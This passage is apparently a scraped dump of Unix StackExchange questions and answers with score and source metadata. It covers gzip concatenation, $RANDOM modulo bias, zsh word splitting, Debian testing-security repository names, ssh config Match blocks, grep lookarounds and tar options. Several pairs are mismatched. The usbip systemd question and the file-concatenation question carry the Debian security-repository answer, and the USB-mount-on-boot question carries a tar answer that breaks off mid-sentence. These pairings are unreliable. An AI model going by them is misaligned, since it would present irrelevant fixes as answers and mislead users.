Now the problem is that the gzip -d command performs extremely slowly. I mean really, really slowly. If it unzips 50 files and makes the concatenated data file, the size would be around 20-25GB. Unzipping 50 files and concatenating them into one takes almost 1 hour, which is huge. At this rate, it's impossible to process all the data generated in a single day. My production server (a VM) is pretty powerful: 44 cores and 256GB RAM. The hard disk is also very good and high performing; iowait is around 0-5. How can I speed up this process? What are the alternatives to gzip -d ? Is there any other way to create the concatenated data file more efficiently? Please note that we need to keep the file name in the records for troubleshooting purposes. Otherwise we could just use zcat and append to a data file without unzipping at all. | There is a lot of disk I/O that could be replaced by pipes. The func_create_dat_file takes a list of 50 compressed files, reads each of them and writes the uncompressed data. It then reads each of the 50 uncompressed data files, and writes it out again with the filename prepended. All of this work is done sequentially, so it cannot take any advantage of your multiple cpus. I suggest you try
func_create_dat_file()
{
    cd raw_directory
    while IFS="" read -r f
    do
        zcat -- "$f" | sed "s/^/${f%.gz}|/"
    done < "${raw_file_list}" >> "${data_file}"
}
Here the compressed data is read once from disk. The uncompressed data is written once to a pipe, read once from the pipe and then written once to the disk. The transformation of the data happens in parallel with the reading and so can use 2 cpus. [Edit] A comment asked to explain the sed "s/^/${f%.gz}|/" part. This is the code to put the filename as a new field at the start of each line. $f is the filename. ${f%.gz} removes .gz from the end of the string. There is nothing special about the | in this context, so ${f%.gz}| is the filename with a trailing .gz removed, followed by a | . In sed , s/old/new/ is the substitute (replace) command; it takes a regular expression for the old part. ^ as a regular expression matches the start of line, so putting this together it says: change the beginning of the line to be the filename without a trailing .gz , followed by a | . The | was added to match the OP's program rather than the OP's description. If it really was a CSV (comma separated variable) file, then this should be a comma rather than a vertical bar. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528094",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/148046/"
]
} |
528,213 | The tail -f command is great for tracing, and in a terminal it's very helpful to be able to, for example, hit enter and type a comment like -- after xyz change... -- for record purposes. I would like to be able to copy the tail output shown in the terminal, plus my annotations, to a second file. Is this possible (other than copying and pasting the output manually)? Thanks! | This does what you need: sh -c 'tail -f file & cat' | tee file2 Note that it duplicates your comments in the terminal output when you press enter. It also works with {...} and (...) instead of sh -c , but then tail -f won't stop running when you press ctrl + c . | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528213",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/104388/"
]
} |
528,302 | I'm a novice data hoarder, and have a few hundred videos archived from YouTube, using the following youtube-dl config file:
-i
-o "%(uploader)s (%(uploader_id)s)/%(upload_date)s - %(title)s - (%(duration)ss) [%(resolution)s] [%(id)s].%(ext)s"
# Archive Settings
--download-archive youtube-dl-archive.txt
-a youtube-dl-channels.txt
# Uniform Format
--prefer-ffmpeg
--merge-output-format mkv
# Get All Subs to SRT
--write-sub
--all-subs
--convert-subs srt
# Get metadata
--add-metadata
--write-description
--write-thumbnail
# Debug
-v
I just recently realized that I should really be including the --write-info-json option. How can I go back through and download just the info-json files for all the videos without re-downloading the videos themselves? I've been using the -a option to keep track of what videos I've already archived, and thus I can easily use that file as a list of all the videos I need to download the info-json file for. But I still don't know how to download just the info-json. Thanks for any pointers here. | Not a fully fledged answer, but as I am new and cannot add a comment, I have to use this: have you tried the -j, --dump-json option, or one of the other ones listed in the manual at https://github.com/ytdl-org/youtube-dl/blob/master/README.md#verbosity--simulation-options ? I just tried it and it seemed to work fine on a single video.
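If you want the .info.json files written to disk (rather than dumped to stdout), a sketch along these lines should work; it assumes your archive entries look like "youtube <id>", and it bypasses your config file so that the download archive does not skip the already-seen videos (reuse your existing -o template so each .info.json lands next to its video):
sed 's#^youtube #https://www.youtube.com/watch?v=#' youtube-dl-archive.txt > urls.txt
youtube-dl --ignore-config --skip-download --write-info-json \
    -o "%(uploader)s (%(uploader_id)s)/%(upload_date)s - %(title)s - (%(duration)ss) [%(resolution)s] [%(id)s].%(ext)s" \
    -a urls.txt | {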
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528302",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360743/"
]
} |
528,307 | I'm using wpa_supplicant to connect to my wifi network. Since I'm using dwm , I want to show the SSID of the connected network in the panel. Is there a way to get the SSID of the connected network in wpa_supplicant ? | You can do this using iwgetid from the wireless_tools package:
pacman -S wireless_tools
Then run:
iwgetid -r
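Since you are already running wpa_supplicant, you can also ask it directly through its control interface (this sketch assumes the interface is wlan0 and that your user is allowed to talk to the control socket):
wpa_cli -i wlan0 status | sed -n 's/^ssid=//p' | {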
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528307",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/166017/"
]
} |
528,323 | According to this document : The environment variable TERM contains an identifier for the text window's capabilities. You can get a detailed list of these capabilities by using the 'infocmp' command, using 'man 5 terminfo' as a reference. But how is the TERM variable actually used? Say the system runs xterm (terminal emulator for the X Window System). Does xterm use the TERM variable, or is it the shell? If so, how? Would xterm stop working if TERM is set to linux ? Also, why isn't colored output disabled if I change TERM from its default value of xterm-256color to something else like xterm ? | The TERM variable is used by programs running in a terminal. It is supposed to allow programs to determine the capabilities of the terminal (or emulator) which is handling their output. It is documented in the ncurses manpage . The terminal itself, including emulators such as xterm , doesn't care about the value of TERM , beyond setting it (in the case of emulators — physical terminals can't). It knows how to handle certain output sequences, and it handles them, without caring about TERM or anything else apart from its internal state. You can set TERM to anything you like in your shell, or even unset it, without changing the terminal's behaviour; for a start, the terminal doesn't know what TERM is set to! Programs which care about TERM are typically those which use an output library which cares, such as ncurses , or in a more basic form Termcap or Terminfo . This includes shells such as Bash and Zsh, which use terminfo, for example for line editing features (being able to erase the line when you move up and down the history). These map the value of TERM to a database of capabilities, which tell the program or library whether the terminal can perform certain tasks (such as moving the cursor, clearing the screen, changing colours) and how to go about it. Some programs, such as GNU grep , assume capabilities without even checking. Changing TERM from xterm-256color to xterm won't change much; in particular it won't disable colour support in programs which refer to TERM : xterm supports colour output too. The difference is in the number of colours which are supported. See How do keyboard input and text output work? , Colors in Man Pages , Which terminal type am I using? , What protocol/standard is used by terminals? for more detail.
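A quick way to see the effect for yourself (assuming ncurses' tput and infocmp are installed): the same terminal window reports different capabilities purely based on the variable:
TERM=xterm-256color tput colors   # prints 256
TERM=xterm tput colors            # prints 8
infocmp xterm | head              # inspect the capability database entry itself | {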
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528323",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/128739/"
]
} |
528,343 | I read about RNGs on Wikipedia and the $RANDOM function on TLDP but they don't really explain this result:
$ max=$((6*3600))
$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c
 21787 0
 22114 1
 21933 2
 12157 3
 10938 4
 11071 5
Why are the values above about 2x more inclined to be 0, 1, 2 than 3, 4, 5, but when I change the max modulo they're almost equally spread over all the values?
$ max=$((9*3600))
$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c
 11940 0
 11199 1
 10898 2
 10945 3
 11239 4
 10928 5
 10875 6
 10759 7
 11217 8 | To expand on the topic of modulo bias, your formula is:
max=$((6*3600))
$(($RANDOM%max/3600))
And in this formula, $RANDOM is a random value in the range 0-32767. RANDOM Each time this parameter is referenced, a random integer between 0 and 32767 is generated. It helps to visualize how this maps to possible values:
0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
0 = 21600-25199
1 = 25200-28799
2 = 28800-32399
3 = 32400-32767
So in your formula, the probability for 0, 1, 2 is twice that of 4, 5. And the probability of 3 is slightly higher than 4, 5 too. Hence your result with 0, 1, 2 as winners and 4, 5 as losers. When changing to 9*3600 , it turns out as:
0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
6 = 21600-25199
7 = 25200-28799
8 = 28800-32399
0 = 32400-32767
1-8 have the same probability, but there is still a slight bias for 0, and hence 0 was still the winner in your test with 100'000 iterations. To fix the modulo bias, you should first simplify the formula (if you only want 0-5 then the modulo is 6, not 3600 or an even crazier number, no sense in that). This simplification alone will reduce your bias by a lot (32766 maps to 0, 32767 to 1, giving a tiny bias to those two numbers). To get rid of bias altogether, you need to re-roll, (for example) when $RANDOM is lower than 32768 % 6 (eliminate the states that do not map perfectly to the available random range).
max=6
for f in {1..100000}
do
    r=$RANDOM
    while [ $r -lt $((32768 % $max)) ]; do r=$RANDOM; done
    echo $(($r%max))
done | sort | uniq -c | sort -n
Test result:
 16425 5
 16515 1
 16720 0
 16769 2
 16776 4
 16795 3
The alternative would be using a different random source that does not have noticeable bias (orders of magnitude larger than just 32768 possible values). But implementing a re-roll logic anyway doesn't hurt (even if it likely never comes to pass). | {
"source": [
"https://unix.stackexchange.com/questions/528343",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/82399/"
]
} |
528,361 | I'm working with a copy of Raspbian, installed with pi-gen . Pi-gen runs in a Docker container with a volume for the filesystem, running debootstrap and custom scripts inside a chroot to the volume. I'm running a shell inside the Raspbian filesystem using chroot and qemu-arm-static , but without Docker. I noticed that the mkinitramfs script was not working. I traced the problem back to dash , which the script is running in. For some reason dash is not expanding filename wildcards in commands:
# echo /*
/*
# ls /
bin boot dev etc home lib media mnt opt proc root run sbin sys tmp usr var
This happens in all folders inside the chroot and also in scripts. This breaks a lot of stuff. However, wildcard expansion works normally in filesystems bind-mounted inside the chroot , such as /proc and /run . Also, path expansion using the same dash binary works inside a different chroot . I've already tried set +f and set +o noglob with no luck. The noglob option is definitely not on:
# set -o
Current option settings
errexit off
noglob off
ignoreeof off
interactive on
monitor on
noexec off
stdin on
xtrace off
verbose off
vi off
emacs off
noclobber off
allexport off
notify off
nounset off
nolog off
debug off
I'm running version 0.5.8-2.4 of the dash package from http://raspbian.raspberrypi.org/raspbian stretch/main armhf . The host machine is running Kali Linux 2019.1 with kernel 4.19.0-kali4-amd64 . Has anyone seen a similar problem before? What could I use as a workaround? Update: The following is the relevant part of the strace dump in a working chroot :
read(0, "echo /*\n", 8192)              = 8
openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents(3, /* 11 entries */, 32768)    = 264
getdents(3, /* 0 entries */, 32768)     = 0
close(3)                                = 0
write(1, "/bin /dev /etc /lib /pls /proc /"..., 46) = 46
The same in the non-working chroot :
read(0, "echo /*\n", 8192)              = 8
openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents64(3, /* 20 entries */, 32768)  = 488
close(3)                                = 0
write(1, "/*\n", 3)                     = 3 | Your strace output points away from dash and at the emulation layer. In the working chroot, the shell's libc lists the directory with getdents(); in the failing one it uses getdents64(), and some releases of qemu-user mistranslated getdents64() for 32-bit guests. The directory read then effectively fails, glob() sees an empty directory, and the shell leaves the pattern literal, exactly as POSIX requires when a pattern matches nothing. That also explains why bind-mounted filesystems and a different chroot (with a libc that still issues getdents()) behave normally. The fix is to upgrade qemu-user-static on the host to a version with the getdents64 fix; as a stop-gap, you can generate any needed file lists outside the chroot and pass them in. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/528361",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360809/"
]
} |
528,502 | this works as expected in bash:
> t="ls -l"
> $t      #== ls -l
> "$t"    #== "ls -l"
ls -l: command not found
But in zsh I got this:
> t="ls -l"
> $t      #== "ls -l"
ls -l: command not found
How can I force the shell to parse the variable value again like bash does? | If you want a variable that expands to more than one argument use an array:
var=(ls -l)
$var
But to store code, the most obvious storage type is a function:
myfunction() ls -l
Or:
myfunction() ls -l "$@"
for that function to take extra arguments to be passed to ls . The fact that bash like most other Bourne-like shells splits unquoted variables upon expansion is IMO a bug. See the kind of problems it leads to . But if you want that behaviour, you can set the shwordsplit option. You could also add the globsubst option to restore another bug found in bash and other Bourne-like shells where variable expansion is also subject to globbing (aka pathname expansion). Or do the full shebang with emulate sh or emulate ksh (but lose a few more zsh features). Without having to go there, you can also tell zsh to explicitly split a variable:
var='ls -l'
$=var         # split on $IFS like the $var of bash/sh
${(s[ ])var}  # split on spaces only regardless of the value of $IFS

var='*.txt'
echo $~var    # do pathname expansion like the $var of bash/sh

var='ls -ld -- *.txt'
$=~var        # do both word splitting and filename generation | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528502",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/34965/"
]
} |
528,655 | I have a group called homeperms on an Ubuntu system, with a few users:
$ cat /etc/group | grep "homeperms"
homeperms:x:1004:jorik,tim.wijma,vanveenjorik,jorik_c
And I've done $ sudo chgrp -R homeperms /home . But when I try to mkdir /home/flask I get a permission denied error (this happens with any other folder name too). I don't want to 777 the folders since I'm going to be dealing with web server stuff. Permissions of home in /:
drwxr-xr-x 12 vanveenjorik homeperms 4096 Jul 6 09:06 home
Permissions inside /home:
drwxr-xr-x 6 vanveenjorik homeperms 4096 Jul 3 20:08 19150
drwxr-xr-x 3 codeanywhere-ssh-key homeperms 4096 Jul 6 08:00 codeanywhere-ssh-key
drwxr-xr-x 2 vanveenjorik homeperms 4096 Jul 6 09:13 downloads
drwxr-xr-x 5 vanveenjorik homeperms 4096 Jul 4 08:43 jorik
drwxr-xr-x 4 jorik_c homeperms 4096 Jul 6 08:09 jorik_c
drwxrwxr-x 4 vanveenjorik homeperms 4096 Jul 3 20:15 mkdir_python
drwxr-xr-x 5 vanveenjorik homeperms 4096 Jul 4 09:09 tim.wijma
drwxr-xr-x 3 vanveenjorik homeperms 4096 Jul 3 18:20 ubuntu
drwxr-xr-x 5 vanveenjorik homeperms 4096 Jul 4 09:27 vanveenjorik
drwxrwxr-x 3 vanveenjorik homeperms 4096 Jul 3 22:28 venvs
I am trying to do this as the user 'jorik_c', and with sudo this (of course) works flawlessly. Before this gets marked as duplicate: the answer to this question didn't help. | By typing the command chgrp -R homeperms /home , you effectively changed the group ownership of /home and everything underneath to homeperms. BUT the group still does not have WRITE access on the directory. Per your output:
drwxr-xr-x 12 vanveenjorik homeperms 4096 Jul 6 09:06 home
Remember, file permissions display as: OWNER, GROUP, EVERYONE ELSE. You can fix it quickly with either of the following:
# keep the existing permission bits (755) and add the WRITE bit for GROUP
chmod 775 /home
# the same thing, expressed symbolically
chmod g+w /home | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528655",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/351927/"
]
} |
528,659 | I'd like to have the functionality described in this video . Basically, use super+scrollup/down or pinch in/out on my touchpad to zoom in on a certain area of the screen like on a phone or tablet. Sadly I need compiz to get the described effect. How can I zoom in without using compiz? I'm using Arch Linux with bspwm + compton. What I've tried:
- xzoom , which can zoom but spawns a new window instead of zooming in on the spot. Not what I want.
- KDE's kmag , pretty much the same as xzoom but with a nice GUI.
- Magnifier , where you can mouse over an area to zoom that area of the screen, which is not really what I want. I want to actually zoom the whole screen like in the video above.
There are open issues in compton's repositories: https://github.com/chjj/compton/issues/188 (dead repo) https://github.com/yshui/compton/issues/43 (new fork) | Fullscreen zoom has to come from the compositor, and compton (and its fork) never implemented it, as the issues you link show, so with bspwm + compton there is no direct equivalent of Compiz's ezoom. Your realistic options are to run a compositor or desktop shell that has a magnifier built in (Compiz, KWin, GNOME Shell), or to use a screenshot-based zoomer such as boomer, which grabs the current screen contents and lets you pan and zoom them smoothly with the mouse. It is not a live view of the desktop, but for inspecting what is on screen it feels quite close to the effect in the video. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528659",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/302467/"
]
} |
528,679 | I have millions of files with the following nomenclature on a Linux machine: 1559704165_a1ac6f55fef555ee.jpg The first 10 digits are a timestamp and the ones following the _ are specific ids. I want to move all the files matching specific filename ids to a different folder. I tried this on the directory with the files: find . -maxdepth 1 -type f | ??????????_a1ac*.jpg |xargs mv -t "/home/ubuntu/ntest" However I am getting an error indicating: bash 1559704165_a1ac6f55fef555ee.jpg: command not found When I tried mv ??????????_a1ac*.jpg I got an "argument list too long" error. I have at least 15 different filename patterns. How do I move them? | You should use: find . -maxdepth 1 -type f -name '??????????_a1ac*.jpg' \-exec mv -t destination "{}" + Here -maxdepth 1 means that you want to search only the current directory, not its subdirectories. -type f means find only regular files. -name '??????????_a1ac*.jpg' is a pattern that matches the files you are searching for. -exec mv -t destination "{}" + means move the matched files to destination. Here + gathers as many matched files as possible into a single mv invocation, like: mv -t dest a b c d Here a b c d are different files. | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528679",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/247049/"
]
} |
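A hedged sketch of a safe dry run for the find command in the answer above; prefixing mv with echo only prints what would run, dest is a placeholder directory, and the second id pattern (b2bd) is purely hypothetical:
# dry run: print the mv invocations instead of executing them
find . -maxdepth 1 -type f -name '??????????_a1ac*.jpg' -exec echo mv -t dest {} +
# several id patterns in one pass with -o (logical OR)
find . -maxdepth 1 -type f \( -name '??????????_a1ac*.jpg' -o -name '??????????_b2bd*.jpg' \) -exec mv -t dest {} +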
528,751 | I cannot run apt-get update as I encounter the following error: # apt-get updateHit:1 http://ftp.br.debian.org/debian testing InReleaseIgn:2 http://security.debian.org/debian-security testing/updates InReleaseErr:3 http://security.debian.org/debian-security testing/updates Release 404 Not Found [IP: 151.101.92.204 80]Reading package lists... DoneE: The repository 'http://security.debian.org/debian-security testing/updates Release' no longer has a Release file.N: Updating from such a repository can't be done securely, and is therefore disabled by default.N: See apt-secure(8) manpage for repository creation and user configuration details.E: Repository 'http://ftp.br.debian.org/debian testing InRelease' changed its 'Codename' value from 'buster' to 'bullseye'N: This must be accepted explicitly before updates for this repository can be applied. See apt-secure(8) manpage for details. So there are two error messages here: The repository no longer has a Release file, which is weird. I checked at http://security-cdn.debian.org/debian-security/zzz-dists/testing/updates/ ant it looks like the Release file is there. Am I looking in the wrong place or is there something else happening? The repository changed its name from buster to bullseye and that this "must be accepted explicitly" (I saw this once today; it wasn't there when I opened the question and it does not appear anymore). This isn't really surprising, but I didn't expect it to be a problem if I'm tracking the repository as testing instead of the release name. What can I do? APT is telling me to read the apt-secure(8) , but it either does not have the information I need or I cannot understand it. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/528751",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/136742/"
]
} |
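A small sketch of applying the rename from the answer above with sed; it assumes the sources.list entries use exactly the testing/updates form shown in the question, so back the file up first:
sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak
sudo sed -i 's|testing/updates|testing-security|g' /etc/apt/sources.list
sudo apt update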
528,769 | I am looking to have a host start up and run usbip [Unit]Description=USB-IP BindingAfter=network-online.target[Service]ExecStartPre=/usr/sbin/usbipd -DExecStart=/usr/sbin/usbip bind --busid 1-1.5ExecStop=/usr/sbin/usbip unbind --busid 1-1.5Restart=on-failure [Install]WantedBy=default.target It appears to start correctly without error, but when I go to the client and list the server it does not show that usbip is running. Also, does anyone know of a script to share all USB devices via USBIP? Thank you for the help. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/528769",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361175/"
]
} |
528,853 | I'm running an ubuntu image in a docker container, with my .ssh directory mounted from my native MacOs environment. My .ssh/config file contains Host * AddKeysToAgent yes UseKeychain yes IdentityFile ~/.ssh/id_ed25519_common This works fine on a mac, but AddKeysToAgent and UseKeychain are not valid for linux, and anything (e.g. git) that uses the openssh-client package won't just ignore the unrecognised directives, but fail and exit. Is there any way of having a .ssh/config file that will let me share it across mac and linux? | You can use the Match keyword in the ssh config file to restrict a portion of the configuration to only apply under certain conditions. For the excerpt in the question, something like the following should work: Host * AddKeysToAgent yes IdentityFile ~/.ssh/id_ed25519_commonMatch exec "uname -s | grep Darwin" UseKeychain yes On a linux system, the grep will return failure (1), and so the following line(s) will be ignored; on the Mac host, the grep will return success (0) and the UseKeychain yes line will be applied. The Match block is terminated by the next Match , Host , or end of file. Note that AddKeysToAgent is not platform-specific, but is available in OpenSSH since version 7.2, so presumably you are using an older version of OpenSSH in the Ubuntu container but not on the Mac host. | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528853",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361232/"
]
} |
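One way to check which directives actually take effect on each platform; this assumes OpenSSH 6.8 or later for the -G option, and example.com is a placeholder host:
# print the effective client configuration for a host
ssh -G example.com | grep -iE 'identityfile|addkeystoagent'
# test the Match condition by hand: exit status 0 means the block applies
uname -s | grep Darwin && echo 'mac-only directives apply'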
529,009 | I tried to upgrade my Debian System using apt , the repository is set to "testing" so I expected it to change to the next version "Bullseye" from "Buster" automatically but since "Buster" moved on I get: 404 Not Found [IP: 151.101.12.204 80] when running apt update . The security.debian.org address does not seem to have Release files, did the address change? E: The repository 'http://security.debian.org testing/updates Release' no longer has a Release file.N: Updating from such a repository can't be done securely, and is therefore disabled by default.N: See apt-secure(8) manpage for repository creation and user configuration details. this are the relevant entries of my /etc/apt/sources.list : deb http://ftp.ch.debian.org/debian/ testing main contrib non-freedeb-src http://ftp.ch.debian.org/debian/ testing main contrib non-freedeb http://security.debian.org/ testing/updates main contrib non-freedeb-src http://security.debian.org/ testing/updates main contrib non-free# jessie-updates, previously known as 'volatile'deb http://ftp.ch.debian.org/debian/ testing-updates main contrib non-freedeb-src http://ftp.ch.debian.org/debian/ testing-updates main contrib non-free I checked man apt-secure but could not find or understand the relevant information. Update: I got two answers so far, both referring to the ofical debian.org page, but suggest a complete different solution. Can someone please explain, since I decided to not remove the security.debian.org entries, but changed the version-attribute format. | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-freedeb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/240990/"
]
} |
529,012 | I am new to bash shell scripting, apologies if this was already asked. I have combinations of multiple files such as: USA.txt Florida.txt Miami.txt I would like to join those files and create a new file which contains everything such as: cat *.txt > USA_FLORIDA_MIAMI.txt In another case The thing is that some other time the files have a different prefix: Canada.txt Quebec.txt Montreal.txt so in this second case, the output will be CANADA_QUEBEC_MONTREAL.txt: cat *.txt > CANADA_QUEBEC_MONTREAL.txt and so on for all the combinations of other files In the first case scenario, USA.txt Florida.txt Miami.txt are the only .txt files present in the directory. In the second case, they will be replaced by Canada.txt Quebec.txt Montreal.txt so I would need to write a code which all the time combines the information of the prefix of all the .txt files present at that time in the directory and it adds it to the prefix of the output file. The variable here is the name of the Country, State and City. Any suggestion about any command which I could use?thanks | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-freedeb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361114/"
]
} |
529,063 | I have a file where each line contains a sentence where one word is found between the character > and <. For example: Martin went shopping at >Wallmart< and lost his walletFrench food >tastes< great I am looking for a command to run from the shell that will print the word inside ">" and "<" for every line. Thanks in advance. | What about grep ? grep -oP "(?<=\>).*(?=<)" file Output: Wallmarttastes EDIT: Following @Toby Speight comment, and assuming that between > and < there are only words, to avoid matching > and < in other contexts the command should be grep -oP "(?<=\>)\w+(?=<)" file | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529063",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/314584/"
]
} |
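A quick demonstration of the lookarounds from the answer above on a sample line from the question; -P needs a GNU grep built with PCRE support:
printf '%s\n' 'French food >tastes< great' | grep -oP '(?<=>)\w+(?=<)'
# prints: tastes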
529,318 | From man tar : -f, --file ARCHIVE use archive file or device ARCHIVE Please consider: tar -zxvf myFile.tar.gz As far as I understand, z means "gzipped tarball", x means "extract", v means "verbose output" but about f I am not sure. If we already give the file name myFile.tar.gz , why is the f argument needed? | It's the option you use to specify the actual pathname of the archive you would want to work with, either for extracting from or for creating or appending to, etc. If you don't use -f archivename , different implementations of tar will behave differently (some may try to use a default device under /dev , the standard input or output stream, or the file/device specified by an environment variable). In the command line that you quote, tar -zxvf myFile.tar.gz which is the same as tar -z -x -v -f myFile.tar.gz you use this option with myFile.tar.gz as the option-argument to specify that you'd like to extract from a particular file in the current directory. Consult the manual for tar on your system to see what data stream or device the utility would use if you don't use the -f option. The GNU tar implementation, for example, has a --show-defaults option that will show the default options used by tar , and this will probably include the -f option (this default may be overridden by setting the TAPE environment variable). | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529318",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
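A companion sketch showing the same extraction with the archive supplied on standard input; myFile.tar.gz is the archive from the question:
# '-' as the archive operand explicitly means stdin here
cat myFile.tar.gz | tar -zxvf -
# GNU tar: inspect what archive would be used if -f were omitted
tar --show-defaults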
529,342 | I just upgraded my server to Debian Buster (Raspbian). However, when I now boot, my USB hard drives aren't mounting. I see something like the following on my splash screen: mount: /media/PiHDD: can't find UUID=<string> If I manually sudo mount -a , then all hard drives are mounted The following is /etc/fstab : proc /proc proc defaults 0 0/dev/mmcblk0p1 /boot vfat defaults 0 0/dev/mmcblk0p2 / ext4 defaults,noatime 0 0UUID=<string> /media/PiHDD ext4 defaults,noatime 0 0UUID=<string2> /media/PiHDD2 ext4 defaults,noatime 0 0... which worked fine before the update to Buster. I've also tried identifying the hard drives using PARTUUID or LABEL , based on the output of blkid , but these also fail on boot with can't find LABEL , etc. I'm not using systemd (PID 1 is init, and file /sbin/init gives an executable). /sbin/init --version gives SysV init version: 2.93 . I've updated to the latest (testing) kernel 4.19.57-v7+ . On boot, I think my system is seeing the USB devices before it tries to mount them. I can see New USB device found before the mounting fails. I also see Attached SCSI disk after the device is found, but I'm not sure if it's before or after the failed mounting. This is all in /var/log/syslog , but for some reason the mount… can't find UUID errors that I see on boot are not in any file in /var/log . How can I get my system to automatically mount my USB hard drives on boot? Here are the contents of /etc/inittab . # /etc/inittab: init(8) configuration.# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $# The default runlevel.id:2:initdefault:# Boot-time system configuration/initialization script.# This is run first except when booting in emergency (-b) mode.si::sysinit:/etc/init.d/rcS# What to do in single-user mode.~~:S:wait:/sbin/sulogin# /etc/init.d executes the S and K scripts upon change# of runlevel.## Runlevel 0 is halt.# Runlevel 1 is single-user.# Runlevels 2-5 are multi-user.# Runlevel 6 is reboot.l0:0:wait:/etc/init.d/rc 0l1:1:wait:/etc/init.d/rc 1l2:2:wait:/etc/init.d/rc 2l3:3:wait:/etc/init.d/rc 3l4:4:wait:/etc/init.d/rc 4l5:5:wait:/etc/init.d/rc 5l6:6:wait:/etc/init.d/rc 6# Normally not reached, but fallthrough in case of emergency.z6:6:respawn:/sbin/sulogin# What to do when CTRL-ALT-DEL is pressed.ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now# Action on special keypress (ALT-UpArrow).#kb::kbrequest:/bin/echo "Keyboard Request--edit /etc/inittab to let this work."# What to do when the power fails/returns.pf::powerwait:/etc/init.d/powerfail startpn::powerfailnow:/etc/init.d/powerfail nowpo::powerokwait:/etc/init.d/powerfail stop# /sbin/getty invocations for the runlevels.## The "id" field MUST be the same as the last# characters of the device (after "tty").## Format:# <id>:<runlevels>:<action>:<process>## Note that on most Debian systems tty7 is used by the X Window System,# so if you want to add more getty's go ahead but skip tty7 if you run X.#1:2345:respawn:/sbin/getty --noclear 38400 tty1 2:23:respawn:/sbin/getty 38400 tty23:23:respawn:/sbin/getty 38400 tty34:23:respawn:/sbin/getty 38400 tty45:23:respawn:/sbin/getty 38400 tty56:23:respawn:/sbin/getty 38400 tty6# Example how to put a getty on a serial line (for a terminal)##T0:23:respawn:/sbin/getty -L ttyS0 9600 vt100#T1:23:respawn:/sbin/getty -L ttyS1 9600 vt100# Example how to put a getty on a modem line.##T3:23:respawn:/sbin/mgetty -x0 -s 57600 ttyS3#Spawn a getty on Raspberry Pi serial lineT0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100 | It's the option you use to specify the actual pathname of the archive you would want to work with, either for extracting from or for creating or appending to, etc. If you don't use -f archivename , different implementations of tar will behave differently (some may try to use a default device under /dev , the standard input or output stream, or the file/device specified by an environment variable). In the command line that you quote, tar -zxvf myFile.tar.gz which is the same as tar -z -x -v -f myFile.tar.gz you use this option with myFile.tar.gz as the option-argument to specify that you'd like to extract from a particular file in the current directory. Consult the manual for tar on your system to see what data stream or device the utility would use if you don't use the -f option. The GNU tar implementation, for example, has a --show-defaults option that will show the default options used by tar , and this 